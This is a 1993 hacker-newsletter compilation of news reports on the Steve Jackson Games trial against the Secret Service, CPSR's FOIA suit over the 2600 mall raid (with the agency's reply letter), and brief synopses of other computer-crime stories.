- denying the free speech and public assembly of callers to Jackson's bulletin
- board system, Illuminati. This portion of the complaint was brought under the
- Privacy Protection Act, which also covers the seized Cyberpunk manuscripts --
- if the judge rules that such a book, stored electronically prior to
- publication, is entitled to the same protections as a printed work.
- The government lawyers argued the Privacy Protection Act applies only to
- journalistic organizations -- an argument Sparks didn't seem to buy.
-
- The lawsuit also contends 4th Amendment principles providing against
- unreasonable search and seizure were violated, on grounds the Electronic
- Communications Privacy Act specifies protection for publishers.
-
- The Justice Department contends electronic mail does not enjoy constitutional
- protections.
-
- "They (users of Illuminati) had no expectation of privacy in their electronic
- mail messages," Batten said. The basis of the argument is that Illuminati's
- callers were not sending communications to others, but rather "revealing" them
- to a third party, Steve Jackson, thus negating their expectation of privacy.
- _______________________________________________________________________________
-
- Computer Case Opens; Agent Admits Errors January 27, 1993
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- by Joe Abernathy (The Houston Chronicle)(Page A11)
- *Reprinted With Permission*
-
- AUSTIN -- Plaintiff's attorneys wrested two embarrassing admissions from the
- U.S. Secret Service on the opening day of a federal civil lawsuit designed to
- establish constitutional protections for electronic publishing and electronic
- mail.
-
- Special Agent Timothy Folly of Chicago admitted that crucial statements were
- erroneous in an affidavit he used to obtain warrants in a 1990 crackdown on
- computer crime.
-
- Foley also conceded that the Secret Service's special training for computer
- crime investigators overlooks any mention of a law that limits search-and-
- seizure at publishing operations.
-
- The case before U.S. District Judge Sam Sparks was brought by Steve Jackson
- Games, an Austin game publisher, with the support of electronic civil rights
- activists who contend that federal agents have overstepped constitutional
- bounds in their investigations of computer crime.
-
- Jackson supporters already have committed more than $200,000 to the litigation,
- which seeks $2 million in damages from the Secret Service and other defendants
- in connection with a March 1990 raid on Jackson Games.
-
- Plaintiffs hope to establish that First Amendment protections of the printed
- word extend to electronic information and to guarantee privacy protections for
- users of computer bulletin board systems, such as one called Illuminati that
- was taken in the raid.
-
- Steve Jackson's attorney, Jim George of Austin, focused on those issues in
- questioning Foley about the seizure of the personal computer on which
- Illuminati ran and another PC which contained the manuscript of a pending
- Jackson Games book release, "GURPS Cyberpunk."
-
- "At the Secret Service computer crime school, were you, as the agent in charge
- of this investigation, made aware of special rules for searching a publishing
- company?" George asked Foley. He was referring to the Privacy Protection Act,
- which states that police may not seize a work in progress from a publisher. It
- does not specify what physical form such a work must take.
-
- Foley responded that the Secret Service does not teach its agents about those
- rules.
-
- Earlier, Foley admitted that his affidavit seeking court approval to raid
- Jackson Games contained an error.
-
- During the raid -- one of several dozen staged that day around the country in
- an investigation called Operation Sun Devil -- agents were seeking copies of a
- document hackers had taken from the computer system of BellSouth.
-
- No criminal charges have been filed against Jackson, his company, or others
- targeted in several Austin raids. The alleged membership of Jackson employee
- Loyd Blankenship in the Legion of Doom hacker's group -- which was believed
- responsible for the BellSouth break-in -- lead agents to raid Jackson Games at
- the same time that Blankenship's Austin home was raided.
-
- Foley's affidavit stated that Bell investigator Henry Kluepfel had logged on to
- the Illuminati bulletin board and found possible evidence of a link between
- Jackson Games and the Legion of Doom.
-
- But George produced a statement from Kluepfel, who works for Bellcore, formerly
- AT&T Bell Labs, disputing statements attributed to him in the affidavit. Foley
- acknowledged that part of the affidavit was erroneous.
-
- The U.S. Department of Justice, which is defending the Secret Service, contends
- that only traditional journalistic organizations enjoy the protections of the
- Privacy Protection Act and that users of electronic mail have no reasonable
- expectation of privacy.
- _______________________________________________________________________________
-
- Judge Rebukes Secret Service For Austin Raid January 29, 1993
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- by Joe Abernathy (The Houston Chronicle)(Page A21)
- *Reprinted With Permission*
-
- AUSTIN -- A federal judge lambasted the U.S. Secret Service Thursday for
- failing to investigate properly before it seized equipment from three Austin
- locations in a 1990 crackdown on computer crime.
-
- U.S. District Judge Sam Sparks' comments came on the final day of trial in a
- lawsuit brought by Steve Jackson Games, an Austin publisher, with the support
- of national computer rights activists.
-
- The judge did not say when he will issue a formal ruling in the case. In
- addition to seeking $ 2 million in damages from the Secret Service and other
- defendants, Jackson hopes to establish privacy and freedom of the press
- protections for electronic information.
-
- In a packed courtroom Thursday morning, Sparks dressed down Secret Service
- Special Agent Timothy Foley of Chicago, who was in charge of the March 1, 1990,
- raid on Jackson, one of his employees and a third Austin man. No criminal
- charges have been filed in connection with the raids.
-
- "The Secret Service didn't do a good job in this case," Sparks said. "We know
- no investigation took place. Nobody ever gave any concern as to whether
- (legal) statutes were involved. We know there was damage (to Jackson)."
-
- The Secret Service has seized dozens of computers since the nationwide
- crackdown began in 1990, but Jackson, a science fiction magazine and game book
- publisher, is the first to challenge the practice. A computer seized at
- Jackson Games contained the manuscript for a pending book, and Jackson alleges,
- among other things, that the seizure violated the Privacy Protection Act, which
- prohibits seizure of publishers' works in progress.
-
- Agents testified that they were not trained in that law at the special Secret
- Service school on computer crime.
-
- Sparks grew visibly angry when testimony showed that Jackson never was
- suspected of a crime, that agents did no research to establish a criminal
- connection between the firm and the suspected illegal activities of an
- employee, and that they did not determine that the company was a publisher.
-
- "How long would it have taken you, Mr. Foley, to find out what Steve Jackson
- Games did, what it was? " asked Sparks. "An hour?
-
- "Was there any reason why, on March 2, you could not return to Steve Jackson
- Games a copy, in floppy disk form, of everything taken?
-
- "Did you read the article in Business Week magazine where it had a picture of
- Steve Jackson -- a law-abiding, tax-paying citizen -- saying he was a computer
- crime suspect?
-
- "Did it ever occur to you, Mr. Foley, that seizing this material could harm
- Steve Jackson economically? "
-
- Foley replied, "No, sir," but the judge offered his own answer:
-
- "You actually did; you just had no idea anybody would actually go out and hire
- a lawyer and sue you."
-
- The judge's rebuke apparently convinced the government to close its defense
- after the testimony from Foley, only one of several government witnesses on
- hand. Justice Department attorney Mark Battan entered subdued testimony
- seeking to limit the award of monetary damages.
-
- The judge's comments came after cross-examination of Foley by Pete Kennedy,
- Jackson's attorney.
-
- Sparks questioned Foley about the raid, focusing on holes in the search
- warrant, why Jackson was not allowed to copy his work in progress after it was
- seized, and why his computers were not returned after the Secret Service
- analyzed them.
-
- "The examination took seven days, but you didn't give Steve Jackson's computers
- back for three months. Why?" asked Sparks.
-
- "So here you are, with three computers, 300 floppy disks, an owner who was
- asking for it back, his attorney calling you, and what I want to know is why
- copies of everything couldn't be given back in days. Not months. Days.
-
- "That's what makes you mad about this case."
-
- Besides alleging that the seizure violated the Privacy Protection Act, Jackson
- alleged that since one of the computers was being used to run a bulletin board
- system containing private electronic mail, the seizure violated the Electronic
- Communications Privacy Act.
-
- Justice Department attorneys have refused comment on the case, but contended in
- court papers that Jackson Games is a manufacturer, and that only journalistic
- organizations can call upon the Privacy Protection Act.
-
- The government said that seizure of an electronic bulletin board system does
- not constitute interception of electronic mail.
-
- The Electronic Frontier Foundation committed more than $200,000 to the Jackson
- suit. The EFF was founded by Mitchell Kapor of Lotus Technology amid a
- computer civil liberties movement sparked in large part by the Secret Service
- computer crime crackdown that included the Austin raids.
-
- "The dressing down of the Secret Service for their behavior is a major
- vindication of what we've been saying all along, which is that there were
- outrageous actions taken against Steve Jackson that hurt his business and sent
- a chilling effect to everyone using bulletin boards, and that there were larger
- principles at stake," said Kapor, contacted at his Cambridge, Massachusetts
- office.
-
- Shari Steele, who attended the trial as counsel for the EFF, said, "We're very
- happy with the way the case came out. That session with the judge and Tim
- Foley is what a lawyer dreams about."
- _______________________________________________________________________________
-
- Going Undercover In The Computer Underworld January 26, 1993
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- by Ralph Blumenthal (The New York Times)(Page B1)
-
- [A 36-year old law enforcement officer from the East Coast masquerades
- as "Phrakr Trakr" throughout the nation's computer bulletin boards.
- As the organizer of the High-Tech Crime Network, he has educated other
- officers in over 28 states in the use of computer communications.
- Their goal is to penetrate some 3000 underground bbses where computer
- criminals trade in stolen information, child pornography and bomb
- making instructions.
-
- "I want to make more cops aware of high-tech crime," he said. "The
- victims are everybody. We all end up paying for it."]
- _______________________________________________________________________________
-
- Hackers Breaking Into UC Computers January 23, 1993
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- by T. Christian Miller (The San Francisco Chronicle)(Page A20)
-
- [According to the University of California, hackers have been breaking
- into the DOD and NASA through UC computer systems. The investigation
- links over 100 computer hackers who have reportedly penetrated
- computers at UC Davis, UC Berkeley, NYU, FSU, and CSU. The FBI stated
- that the investigation reached as far as Finland and Czechoslovakia
- but did not comment on any arrests.
-
- University officials have asked all users to change to more complex
- passwords by April 1.]
-
- _______________________________________________________________________________
-
- Feds Sued Over Hacker Raid At Mall February 5, 1993
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- by Joe Abernathy (The Houston Chronicle)(Page A5)
-
- [A lawsuit was filed 2-4-93 in the Washington, D.C. federal court to
- force the secret service to disclose its involvement in the disruption
- of a meeting of computer hackers last year. The meeting, a monthly
- gathering of readers of "2600 Magazine" at the Pentagon City Mall was
- disrupted on November 6, 1992, when mall security and Arlington County
- Police questioned and searched the attendees.
-
- The suit was filed by the Computer Professionals for Social
- Responsibility. "If this was a Secret Service operation, it raises
- serious constitutional questions," said Marc Rotenberg, director of
- CPSR.
-
- The Secret Service declined to comment on the matter.]
-
- ----------
-
-
- [New Info in 2600 Case - from email sent by CPSR]
-
- One month after being sued under the Freedom of Information
- Act (FOIA), the Secret Service has officially acknowledged that
- it possesses "information relating to the breakup of a meeting
- of individuals at the Pentagon City Mall in Arlington, Virginia."
- The admission, contained in a letter to Computer Professionals for
- Social Responsibility (CPSR), confirms widespread suspicions that
- the agency played a role in the detention and search of
- individuals affiliated with "2600" Magazine at the suburban
- Washington mall on November 6, 1992.
-
- CPSR filed suit against the Secret Service on February 4
- after the agency failed to respond to the organization's FOIA
- request within the statutory time limit. In its recent response,
- the Secret Service released copies of three news clippings
- concerning the Pentagon City incident but withheld other
- information "because the documents in the requested file contain
- information compiled for law enforcement purposes." While the
- agency asserts that it possesses no "documentation created by the
- Secret Service chronicling, reporting, or describing the breakup
- of the meeting," it does admit to possessing "information provided
- to the Secret Service by a confidential source which is
- information relating to the breakup of [the] meeting." Federal
- agencies classify other law enforcement agencies and corporate
- entities, as well as individuals, as "confidential sources."
-
- The propriety of the Secret Service's decision to withhold
- the material will be determined in CPSR's pending federal lawsuit.
- A copy of the agency's letter is reprinted below.
-
- David L. Sobel dsobel@washofc.cpsr.org
- Legal Counsel (202) 544-9240 (voice)
- CPSR Washington Office (202) 547-5481 (fax)
-
- ************************************************
-
-
- DEPARTMENT OF THE TREASURY
- UNITED STATES SECRET SERVICE
-
- MAR 5 1993
-
- 920508
-
-
- David L. Sobel
- Legal Counsel
- Computer Professionals for
- Social Responsibility
- 666 Pennsylvania Avenue, S.E.
- Suite 303
- Washington, D.C. 20003
-
- Dear Mr. Sobel:
-
- This is in response to your Freedom of Information Act (FOIA)
- request for access to "copies of all records related to the
- breakup of a meeting of individuals affiliated with "2600
- Magazine" at the Pentagon City Mall in Arlington, Virginia on
- November 6, 1992."
-
- Enclosed, please find copies of materials which are responsive to
- your request and are being released to you in their entirety.
-
- Other information has been withheld because the documents in the
- requested file contain information compiled for law enforcement
- purposes. Pursuant to Title 5, United States Code, Section
- 552(b)(7)(A); (C); and (D), the information has been exempted
- since disclosure could reasonably be expected to interfere with
- enforcement proceedings; could reasonably be expected to
- constitute an unwarranted invasion of personal privacy to other
- persons; and could reasonably be expected to disclose the
- identity of a confidential source and/or information furnished by
- a confidential source. The citations of the above exemptions are
- not to be construed as the only exemptions that are available
- under the Freedom of Information Act.
-
- In regard to this matter it is, however, noted that your FOIA
- request is somewhat vague and very broadly written. Please be
- advised, that the information being withheld consists of
- information provided to the Secret Service by a confidential
- source which is information relating to the breakup of a meeting
- of individuals at the Pentagon City Mall in Arlington, Virginia,
- and, therefore, appears to be responsive to your request as it
- was written. If, however, the information you are seeking is
- information concerning the Secret Service's involvement in the
- breakup of this meeting, such as any type of documentation
- created by the Secret service chronicling, reporting, or
- describing the breakup of the meeting, please be advised that no
- such information exists.
-
- If you disagree with our determination, you have the right of
- administrative appeal within 35 days by writing to Freedom of
- Information Appeal, Deputy Director, U. S. Secret Service,
- 1800 G Street, N.W., Washington, D.C. 20223. If you choose to
- file an administrative appeal, please explain the basis of your
- appeal.
-
- Sincerely,
-
- /Sig/
- Melvin E. Laska
- ATSAIC
- Freedom of Information &
- Privacy Acts Officer
-
- Enclosure
-
- *******************************************
-
- For more information, refer to Phrack World News, Issue 41/1:
-
- Reports of "Raid" on 2600 Washington Meeting November 9, 1992
- Confusion About Secret Service Role In 2600 Washington Raid November 7, 1992
- Conflicting Stories In 2600 Raid; CRSR Files FOIA November 11, 1992
- _______________________________________________________________________________
-
- Surfing Off The Edge February 8, 1993
- ~~~~~~~~~~~~~~~~~~~~
- by Richard Behar (Time Magazine)(Page 62)
-
- [This article is so full of crap that I cannot even bring myself
- to include a synopsis of it. Go to the library and read it
- and laugh.]
- _______________________________________________________________________________
-
- Bulgarian Virus Writer, Scourge in the West, Hero at Home January 29, 1993
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- by David Briscoe (Associated Press)
-
- [The Dark Avenger, believed to be a computer programmer in Sophia, has
- drawn the attention of computer crime squads in the US and Europe. To
- many programmers the Dark Avenger is a computer master to many young
- Bulgarians. "His work is elegant. ... He helps younger programmers.
- He's a superhero to them," said David Stang director for the
- International Virus Research Center.
-
- Neither Bulgaria nor the US has laws against the writing of computer
- viruses]
- _______________________________________________________________________________
-
- Computer Security Tips Teach Tots To Take Byte Out Of Crime February 3, 1993
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- by Michelle Locke (Associated Press)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Young Students Learn Why Computer Hacking Is Illegal February 4, 1993
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- by Bill Wallace (San Francisco Chronicle)(Page A22)
-
- [In an attempt to teach computer crime prevention, children in
- kindergarten through third grade in a Berkeley elementary school are
- being shown a 30 minute presentation on ethics and security.
-
- The program consists of several skits using puppets to show the
- children various scenarios from eating food near computer systems to
- proper password management.
-
- In one episode, Gooseberry, a naive computer user, has her files
- erased by Dirty Dan, the malicious hacker, when she neglects to log
- off.
-
- Philip Chapnick, director of the Computer Security Institute in San
- Francisco, praised the idea. "One of the major issues in information
- security in companies now is awareness. Starting the kids early ... I
- think it will pay off," said Chapnick.]
- _______________________________________________________________________________
-
- Tracking Hackers - Experts Find Source In Adolescence February 25, 1993
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- By Mike Langberg (Knight-Ridder News Service)
-
- [At the National Computer Security Association convention in San
- Francisco, four experts analyzed the psyche of today's hacker.
- The panel decided that hacker bonding came from a missing or defective
- family. The panel also decided that hackers weren't necessarily
- geniuses, and that a few weeks of study would be enough to begin.
-
- Panel member Winn Schwartau stated that there should be an end to
- slap-on-the-wrist penalties. Sending hackers to jail would send a
- clear message to other hackers, according to Schwartau.
-
- "What strikes me about hackers is their arrogance," said Michael
- Kabay, computer security consultant from Montreal. "These people seem
- to feel that their own pleasures or resentments are of supreme
- importance and that normal rules of behavior simply don't apply to
- them."]
- _______________________________________________________________________________
-
- Bomb Recipes Just A Keystroke Away January 10, 1993
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- by Tracy Gordon Fox (The Hartford Courant)(Page B1)
-
- [Teenagers gathering information via computer have contributed greatly
- to the fifty percent increase in the number of homemade explosives
- found last year.
-
- The computer age has brought the recipes for the explosives to the
- fingertips of anyone with a little computer knowledge and a modem.
-
- One of the first police officers to discover that computers played a
- part in a recent West Hartford, Connecticut, bombing said that
- hackers were loners, who are socially dysfunctional, excel in
- mathematics and science, and are "over motivated in one area."
-
- The trend has been seen around the country. The 958 bombing incidents
- reported nationally to the Bureau of Alcohol, Tobacco and Firearms was
- the highest in 15 years.]
- _______________________________________________________________________________
-
- Hackers Hurt Cellular Industry January 25, 1993
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- by John Eckhouse (The San Francisco Chronicle)(Page C1)
-
- [With only a little equipment and technical knowledge, telephone
- pirates can make free calls and eavesdrop on cellular conversations.
-
- "Technically, eavesdroping is possible, but realistically I don't
- think it can be done," said Justin Jasche chief executive of Cellular One.
-
- The Cellular Telecommunications Industry Association estimates that
- hackers make about $300 million worth of unauthorized calls a year,
- though others put the figure much higher.]
-
- -------------------------------------------------------------------------------
-
- Cellular Phreaks and Code Dudes February 1993
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- by John Markoff (Wired) (page 60)
-
- [Two hackers, V.T. and N.M. have discovered that celluar phones are
- really just little computers linked by a gigantic cellular network.
- And like most computers, they are programmable. The hackers have
- discovered that the OKI 900 has a special mode that will turn it into
- a scanner, enabling them to listen in on other cellular conversations.
-
- The two also discovered that the software stored in the phones ROM
- takes up roughly 40K, leaving over 20K free to add in other features,
- They speculate on the use of the cellular phone and a computer
- to track users through cell sites, and to monitor and decode
- touchtones of voice mail box codes and credit card numbers.
-
- Said V.T. of the OKI's programmers, "This phone was clearly built by
- hackers."]
-
- -------------------------------------------------------------------------------
-
- Callers Invited To Talk Sex, Thanks To Hacker's Prank February 5, 1993
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- (The Vancouver Sun) (Page A-9)
-
- [For the past two weeks, surprised callers to CTC Payroll Services'
- voice-mail system have been invited to talk sex. Instead
- of a pleasant, professional salutation, callers hear a man's voice
- suggesting that they engage a variety of intimate activities.
-
- The prankster is a computer hacker who can re-program the greeting message
- on company telephones. Company owner Cheryl MacLeod doesn't think the joke
- is very funny and says the hacker is ruining her business.]
- _______________________________________________________________________________
-